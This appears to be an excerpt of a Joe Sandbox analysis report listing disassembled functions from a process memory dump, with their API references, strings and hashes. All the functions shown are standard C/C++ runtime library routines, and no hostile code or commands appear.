API String ID: 2854358121-950290719
Opcode ID: 4922b13a143e6dbf261f658818307233683e7afd1daef14d38ba8095a937ef0c
Instruction ID: 543ae7dbe4bda96c7852e2e21a6096a35ec063532be5a896788243aec3f4c478
Opcode Fuzzy Hash: 4922b13a143e6dbf261f658818307233683e7afd1daef14d38ba8095a937ef0c
Instruction Fuzzy Hash: 3801C076900119DBCB14EB64C809ABE77B1BF94720F254A0AF504A72D2DF7C9E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00702E9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702EA5
std::_Lockit::_Lockit.LIBCPMT ref: 00702EAF

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702F00
std::_Lockit::~_Lockit.LIBCPMT ref: 00702F20

Strings

2q, xrefs: 00702F0D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: c2210b53261155542c54ef3bc6b0e6d52cb0c17667c1cc2e3e7859771f6ba2d0
Instruction ID: 074ce0506ea0dc18a0d8ff6bdf4f0180ec9e32b53f3a0aab54e569ffe26af467
Opcode Fuzzy Hash: c2210b53261155542c54ef3bc6b0e6d52cb0c17667c1cc2e3e7859771f6ba2d0
Instruction Fuzzy Hash: 6A018076A0011AEBCB15EB64D809ABE77B1BF84720F254619F510A72D2CF7CAE05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00702F33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702F3A
std::_Lockit::_Lockit.LIBCPMT ref: 00702F44

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702F95
std::_Lockit::~_Lockit.LIBCPMT ref: 00702FB5

Strings

2q, xrefs: 00702FA2

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: e744874cd14c3059bef689108997246c091ba346636ca301fe99d73aac7ed3f1
Instruction ID: d62ca8e0a59b34f63b9dcf5ba1d8b86a83666b0ddad402ecfb2e7b846be2ae23
Opcode Fuzzy Hash: e744874cd14c3059bef689108997246c091ba346636ca301fe99d73aac7ed3f1
Instruction Fuzzy Hash: 7D01C476900119DFCB15FB64C809ABEB7B1BF84720F244609F500A72D2CF7CAE018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00712D20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00712CBD,00000064), ref: 00712D43
LeaveCriticalSection.KERNEL32(0074DD3C,?,?,00712CBD,00000064,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712D4D
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00712CBD,00000064,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712D5E
EnterCriticalSection.KERNEL32(0074DD3C,?,00712CBD,00000064,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712D65

Strings

2q, xrefs: 00712D3D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: 2q
API String ID: 3269011525-950290719
Opcode ID: 9cb87cd94506c35f5bf5379ff7bc49856fb28dc12990543fe4671eeea00f945f
Instruction ID: 3334c4e2b05cb5340d64ced67b9912912f4cb3d1291482b82c3d2807cd6d3c87
Opcode Fuzzy Hash: 9cb87cd94506c35f5bf5379ff7bc49856fb28dc12990543fe4671eeea00f945f
Instruction Fuzzy Hash: 61E09272B05528BBDB362B44EC08A8A3F29AF05B12B004062F58566171C7AC4D51CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 00726DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00726E40
__alloca_probe_16.LIBCMT ref: 00726F01
__freea.LIBCMT ref: 00726F68

Part of subcall function 00725BDC: HeapAlloc.KERNEL32(00000000,00000000,A8r,?,0072543A,?,00000000,?,00716CE7,00000000,A8r,00000000,?,?,?,0072363B), ref: 00725C0E

__freea.LIBCMT ref: 00726F7D
__freea.LIBCMT ref: 00726F8D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 46ecc37ac4cb042825ee62942be13110e50634332c8094a322c9a6701fe6ee83
Instruction ID: 39bf5046db4ac84f803ec9d324e79af66e4ad1397504d9009925de006fb2982a
Opcode Fuzzy Hash: 46ecc37ac4cb042825ee62942be13110e50634332c8094a322c9a6701fe6ee83
Instruction Fuzzy Hash: EF518E72A00226EFEF259FA4ED85EBF3AA9EF04750F15012AFD08D6151E739DC5086A0

Uniqueness

Uniqueness Score: -1.00%

Function 006FB8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006FB8DD
std::_Lockit::_Lockit.LIBCPMT ref: 006FB900
std::_Lockit::~_Lockit.LIBCPMT ref: 006FB928
std::_Facet_Register.LIBCPMT ref: 006FB98D
std::_Lockit::~_Lockit.LIBCPMT ref: 006FB9B7

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 9f197f74770fb3403e8b7dda7d93e6be4c25d1dd5ca15e0add5ba9441bb441c4
Instruction ID: a3be39eb752b67deff5bd2c35db420c211847cea82008d567ad0fcefb17e5372
Opcode Fuzzy Hash: 9f197f74770fb3403e8b7dda7d93e6be4c25d1dd5ca15e0add5ba9441bb441c4
Instruction Fuzzy Hash: 2031F335900218DFCB11DF54D944BAEB7B5FF22324F15825AEA44673A1D774AD01CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00701C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00701C62
_Maklocstr.LIBCPMT ref: 00701C7F
_Maklocstr.LIBCPMT ref: 00701C9C
_Maklocchr.LIBCPMT ref: 00701CAE
_Maklocchr.LIBCPMT ref: 00701CC1

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: f530baac70f2801d4cb9bde4149b0229f893e8b4653fb670860fb0b67a9cb91f
Instruction ID: 8cf2ef380e64e9da76e00ef304056b503fabb436d70fdaffb08e10607037d670
Opcode Fuzzy Hash: f530baac70f2801d4cb9bde4149b0229f893e8b4653fb670860fb0b67a9cb91f
Instruction Fuzzy Hash: 10118CB1940784FBE720DBA4C885F27B7ECAF05351F480619F645CBA81D2A8FD5087A5

Uniqueness

Uniqueness Score: -1.00%

Function 006FEC87 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 317COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 006FEC8E

Part of subcall function 006FD87C: __EH_prolog3.LIBCMT ref: 006FD883
Part of subcall function 006FD87C: std::_Lockit::_Lockit.LIBCPMT ref: 006FD88D
Part of subcall function 006FD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 006FD8FE

_Find_elem.LIBCPMT ref: 006FEE8A

Strings

2q, xrefs: 006FECBC, 006FED00
0123456789ABCDEFabcdef-+Xx, xrefs: 006FECF6

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 2q$0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-1126207581
Opcode ID: a71cc18f661e13f516e54eb56dc2334e1ac574997940ee50b6ffacf11c26d08b
Instruction ID: a23323a251e59e0440ed41a1845d5b96bd4b569275371cccb690a4918e957d69
Opcode Fuzzy Hash: a71cc18f661e13f516e54eb56dc2334e1ac574997940ee50b6ffacf11c26d08b
Instruction Fuzzy Hash: 76C18F34E0528C8ADF25DBA8D5507FCBFB3AF55300F28406AE9856B3A3C7269D46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 007062BE Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 007062C8

Part of subcall function 00702D74: __EH_prolog3.LIBCMT ref: 00702D7B
Part of subcall function 00702D74: std::_Lockit::_Lockit.LIBCPMT ref: 00702D85
Part of subcall function 00702D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00702DF6

_Find_elem.LIBCPMT ref: 00706502

Strings

2q, xrefs: 007062FC, 00706349
0123456789ABCDEFabcdef-+Xx, xrefs: 0070633F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 2q$0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-1126207581
Opcode ID: 73b8dffade6b0e68955d5115bb97e197bf188a728888c179664e0915cc31cee0
Instruction ID: 179ac74fe21ea090bd6e49a6a9cfb2b26c354184a3ae71abe4b7192c4812359b
Opcode Fuzzy Hash: 73b8dffade6b0e68955d5115bb97e197bf188a728888c179664e0915cc31cee0
Instruction Fuzzy Hash: 12C1A370E04268CADF25DF64C8647ADBBF2BF51304F548299E885AB2C7DB388D95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00706694 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070669E

Part of subcall function 006FB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 006FB8DD
Part of subcall function 006FB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 006FB900
Part of subcall function 006FB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 006FB928
Part of subcall function 006FB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 006FB9B7

_Find_elem.LIBCPMT ref: 007068D8

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00706715
2q, xrefs: 007066D2, 0070671F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 2q$0123456789ABCDEFabcdef-+Xx
API String ID: 3042121994-1126207581
Opcode ID: f0165cf70039c7310033af615e8d9927549edaa1e2dbfc9947df364739f8f138
Instruction ID: c7d6b1899abc7c4cc1f3c81b1ea694aae9cacfd33598452499b6263e3d5a39ad
Opcode Fuzzy Hash: f0165cf70039c7310033af615e8d9927549edaa1e2dbfc9947df364739f8f138
Instruction Fuzzy Hash: D8C17070A04268CFDF259F64C8647ADBBF2BF51304F548299E885AB2C2DB389D95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 006FBB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,DBD9785B,?,00000000), ref: 006FBBA3
Concurrency::cancel_current_task.LIBCPMT ref: 006FBD7F

Strings

false, xrefs: 006FBC95
true, xrefs: 006FBCAB

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: AllocConcurrency::cancel_current_taskLocal
String ID: false$true
API String ID: 3924972193-2658103896
Opcode ID: 0508771601ea6ec1ef26fb4ae67d09d397c08f03a9fd621d9f8b680ee265c171
Instruction ID: f650c83ca48cc8ca140bd8afc82bb20b521c8bdb78a0ccbad7b7c213673af017
Opcode Fuzzy Hash: 0508771601ea6ec1ef26fb4ae67d09d397c08f03a9fd621d9f8b680ee265c171
Instruction Fuzzy Hash: 79617DB1D0074CDBDB10DFA4C941BEEB7B4FF14704F14826AE945AB282E779AA44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0070D4FA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070D501
_swprintf.LIBCMT ref: 0070D573

Part of subcall function 0070254E: __EH_prolog3.LIBCMT ref: 00702555
Part of subcall function 0070254E: std::_Lockit::_Lockit.LIBCPMT ref: 0070255F
Part of subcall function 0070254E: std::_Lockit::~_Lockit.LIBCPMT ref: 007025D0

Part of subcall function 00702FC8: __EH_prolog3.LIBCMT ref: 00702FCF

Strings

2q, xrefs: 0070D5C9, 0070D611
%.0Lf, xrefs: 0070D56B

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
String ID: 2q$%.0Lf
API String ID: 3050236999-4149677826
Opcode ID: 4f6d3a99438015d3a3b11ed693403f889e8e985cc2d57704e50979b2b4f10d7a
Instruction ID: f7236c765d71b0a69945ec4b8eb4f2b9e317e1b5147c774f3a9d9f5ea63da258
Opcode Fuzzy Hash: 4f6d3a99438015d3a3b11ed693403f889e8e985cc2d57704e50979b2b4f10d7a
Instruction Fuzzy Hash: AC415971900308EBCB05DFE4CC49AEDBBB5FB08304F208559E845AB291EB399925CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0070D79E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070D7A5
_swprintf.LIBCMT ref: 0070D817

Part of subcall function 006F8610: std::_Lockit::_Lockit.LIBCPMT ref: 006F8657
Part of subcall function 006F8610: std::_Lockit::_Lockit.LIBCPMT ref: 006F8679
Part of subcall function 006F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 006F86A1
Part of subcall function 006F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 006F880E

Strings

2q, xrefs: 0070D86D, 0070D8B5
%.0Lf, xrefs: 0070D80F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: 2q$%.0Lf
API String ID: 1487807907-4149677826
Opcode ID: 5a0fb8fc6d79bb9e40b4291de75f06fbabaab52eb80e3d03ac083e535d5443e7
Instruction ID: 415d4dbeb5803ae488d7683345fdf2c4ded43108d195caa8f8cc4eddc0868a08
Opcode Fuzzy Hash: 5a0fb8fc6d79bb9e40b4291de75f06fbabaab52eb80e3d03ac083e535d5443e7
Instruction Fuzzy Hash: C8418971D00308EBCF45EFE4C845AEE7BB5FB08310F208559E945AB295EB39A915CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00711887 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0071188E
_swprintf.LIBCMT ref: 00711900

Part of subcall function 006F9270: std::_Lockit::_Lockit.LIBCPMT ref: 006F92A0
Part of subcall function 006F9270: std::_Lockit::_Lockit.LIBCPMT ref: 006F92C2
Part of subcall function 006F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 006F92EA
Part of subcall function 006F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 006F9422

Strings

2q, xrefs: 00711956, 0071199B
%.0Lf, xrefs: 007118F8

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: 2q$%.0Lf
API String ID: 1487807907-4149677826
Opcode ID: 2858c0e68c31c05ca48940e4fbef0b309fa206d2463d10caf13e169f99df9dac
Instruction ID: 4a9c07ab60857d309962580c978cda2e610175ad4d8ed3e6a7609b523f5529c1
Opcode Fuzzy Hash: 2858c0e68c31c05ca48940e4fbef0b309fa206d2463d10caf13e169f99df9dac
Instruction Fuzzy Hash: B2416A71E0020DABCF05DFD4C855AED7BB6FB08310F208449E955AB291DB39AA55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00708386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070838D

Part of subcall function 00701C42: _Maklocstr.LIBCPMT ref: 00701C62
Part of subcall function 00701C42: _Maklocstr.LIBCPMT ref: 00701C7F
Part of subcall function 00701C42: _Maklocstr.LIBCPMT ref: 00701C9C
Part of subcall function 00701C42: _Maklocchr.LIBCPMT ref: 00701CAE
Part of subcall function 00701C42: _Maklocchr.LIBCPMT ref: 00701CC1

_Mpunct.LIBCPMT ref: 0070841A
_Mpunct.LIBCPMT ref: 00708434

Strings

$+xv, xrefs: 0070843F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: 0d1f3bb9134fa75cf7db59a37478ec846b3d89c734207b7be0dd60c5023fdb1a
Instruction ID: ed6c346bba4bb403fc822fb9f5c34f1e883c40d6d45ea0b527cf11724dc36121
Opcode Fuzzy Hash: 0d1f3bb9134fa75cf7db59a37478ec846b3d89c734207b7be0dd60c5023fdb1a
Instruction Fuzzy Hash: D12192B1904A96EEDB65DF75C48477BBEF8BB08300F04465AF099C7A82D778E601CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0070FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070FFF1
_Mpunct.LIBCPMT ref: 0071007E
_Mpunct.LIBCPMT ref: 00710098

Strings

$+xv, xrefs: 007100A3

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: dab7c4be12b3d6b368d340c128705135570cd66a57177138da3ece5464422284
Instruction ID: 669de7d9b0404125bb72fc4d91f485a7a3df1cd73740c39b9b36bafd4bab5c52
Opcode Fuzzy Hash: dab7c4be12b3d6b368d340c128705135570cd66a57177138da3ece5464422284
Instruction Fuzzy Hash: CE2195B1904B95AED725DF78845477B7EF8BB0C300F04461AE059C7A82D778D641CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 006F24C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,?,006F1434,?,00000000), ref: 006F2569
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,006F1434,?,00000000), ref: 006F2589
LocalFree.KERNEL32(?,006F1434,?,00000000), ref: 006F25DF
CloseHandle.KERNEL32(00000000,DBD9785B,?,00000000,00733C40,000000FF,00000008,?,?,?,?,006F1434,?,00000000), ref: 006F2633
LocalFree.KERNEL32(?,DBD9785B,?,00000000,00733C40,000000FF,00000008,?,?,?,?,006F1434), ref: 006F2647

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Local$AllocFree$CloseHandle
String ID:
API String ID: 1291444452-0
Opcode ID: 28e9fcc5702012b5a411fd0998f72295409fc32510e64db5965c7c370cad5fa7
Instruction ID: 7db277d91ec03b2681ad7456e74c598a05e5eea88676db230636fd405c9f15f3
Opcode Fuzzy Hash: 28e9fcc5702012b5a411fd0998f72295409fc32510e64db5965c7c370cad5fa7
Instruction Fuzzy Hash: 82410C7260431A9BC7149F68DCA4ABAB7DAEB45361F10462AF626C73D0D734DC44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 006FA910 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 377COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(006F9C9B), ref: 006FACD1

Strings

@Tt, xrefs: 006FA941
